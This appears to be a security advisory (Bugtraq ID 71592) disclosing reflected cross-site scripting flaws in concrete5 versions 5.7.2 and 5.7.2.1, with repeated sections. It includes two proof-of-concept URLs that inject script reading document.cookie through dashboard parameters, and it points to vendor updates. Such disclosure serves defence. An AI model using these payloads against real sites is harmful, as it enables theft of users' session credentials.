concrete5 Multiple Cross-Site Scripting Vulnerabilities
BID:71592
Info
concrete5 Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 71592 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2014 12:00AM |
| Updated: | Jan 12 2015 12:01AM |
| Credit: | Simo Ben youssef |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
concrete5 Multiple Cross-Site Scripting Vulnerabilities
concrete5 is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize the user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
concrete5 5.7.2 and 5.7.2.1 are vulnerable; other versions may also be affected.
concrete5 is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize the user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
concrete5 5.7.2 and 5.7.2.1 are vulnerable; other versions may also be affected.
Exploit / POC
concrete5 Multiple Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.
The following example URIs are available:
http://www.example.com/index.php/dashboard/users/groups/bulkupdate/search?gName=";<script>alert(document.cookie)</script>&ccm-submit-button=Search
http://www.example.com/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id=";><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=
An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.
The following example URIs are available:
http://www.example.com/index.php/dashboard/users/groups/bulkupdate/search?gName=";<script>alert(document.cookie)</script>&ccm-submit-button=Search
http://www.example.com/index.php/tools/required/dashboard/sitemap_drag_request?origCID=147&destCID=148&instance_id=";><BODY ONLOAD=alert(document.cookie)>&ctask=MOVE&ccm_token=1418116264:3ac1b1774e77fbc61b1c6b97a4f7c9ea&dragMode=
Solution / Fix
concrete5 Multiple Cross-Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.